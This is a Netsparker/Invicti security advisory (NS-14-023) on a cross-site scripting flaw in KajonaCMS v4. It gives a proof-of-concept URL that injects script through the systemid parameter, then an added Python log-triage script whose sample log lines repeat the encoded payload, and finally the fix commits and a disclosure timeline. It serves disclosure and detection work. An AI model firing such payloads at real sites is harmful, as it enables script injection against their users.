XSS Vulnerability in KajonaCMS
Information
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerability in KajonaCMS
Software: KajonaCMS v4 and possibly below.
Vendor Homepage: http://www.kajona.de/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-023
Description
Kajona is a content management framework based on PHP5 and published as an open-source project under the LGPL license. The roots of the project go back to 2004, when collected programming solutions were combined into a library. The idea of a web content management framework was born, followed by version 2.0 in 2005 and 2.1 at the beginning of 2006. Version 3.0 was published with a complete code rewrite in 2006.
Details
KajonaCMS v4 is affected by a cross-site scripting (XSS) vulnerability.
The PoC URL, which carries the payload in the systemid query string parameter, is as follows:
- Cross-site Scripting
http://example.com/index.php?page=downloads&systemid=';"--></style></scRipt><scRipt>alert(0x0001EE)</scRipt>&action=mediaFolder
(Querystring)
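For triaging web server logs against this issue, the following added example (not part of the original advisory or of Kajona's code) flags requests whose systemid query string parameter contains anything other than alphanumeric characters, undoing repeated percent-encoding first. The allowlist for legitimate systemid values, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: legitimate systemid values are plain alphanumeric tokens.
SAFE_SYSTEMID = re.compile(r"[A-Za-z0-9]*")
# Client address and request target of a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded input is visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_systemid(target):
    """Return the decoded systemid if it is outside the allowlist, else None."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() == "systemid":
            decoded = fully_decode(value)
            if not SAFE_SYSTEMID.fullmatch(decoded):
                return decoded
    return None

def scan(lines):
    """Return (client, decoded systemid) for every line that needs review."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        hit = suspicious_systemid(match.group(2)) if match else None
        if hit is not None:
            findings.append((match.group(1), hit))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2014:10:00:00 +0000] "GET /index.php?page=downloads'
    '&systemid=%27%3B%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Ealert(0x0001EE)'
    '%3C%2FscRipt%3E&action=mediaFolder HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Jun/2014:10:01:00 +0000] "GET /index.php?page=downloads'
    '&systemid=0a1b2c3d4e5f60718293&action=mediaFolder HTTP/1.1" 200 4811',
    '198.51.100.7 - - [10/Jun/2014:10:02:00 +0000] "GET /index.php?page=downloads'
    '&systemid=%253Cb%253E&action=mediaFolder HTTP/1.1" 200 5003',
]
if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: systemid={value!r}")
```

A hit only means the request deserves review; whether the installation reflected the value depends on whether the fixes listed under Solution are applied.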
Solution
https://github.com/kajona/kajonacms/commit/8f1b18150cc2a8f27c96d9c4f94a81022fbb61e3
https://github.com/kajona/kajonacms/commit/4a07f949c171da6aa9a6e6c19421b0df16297180
Advisory Timeline
05/06/2014 – First Contact
07/06/2014 – Second Contact
08/06/2014 – Vulnerability fixed
23/06/2014 – Advisory released
Credits
The vulnerability was discovered while testing the Invicti Web Application Security Scanner.
About Invicti
Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications, regardless of the platform and the technology they are built on. Invicti’s unique detection and exploitation techniques allow it to be dead accurate in reporting, hence it is the first and only false-positive-free web application security scanner.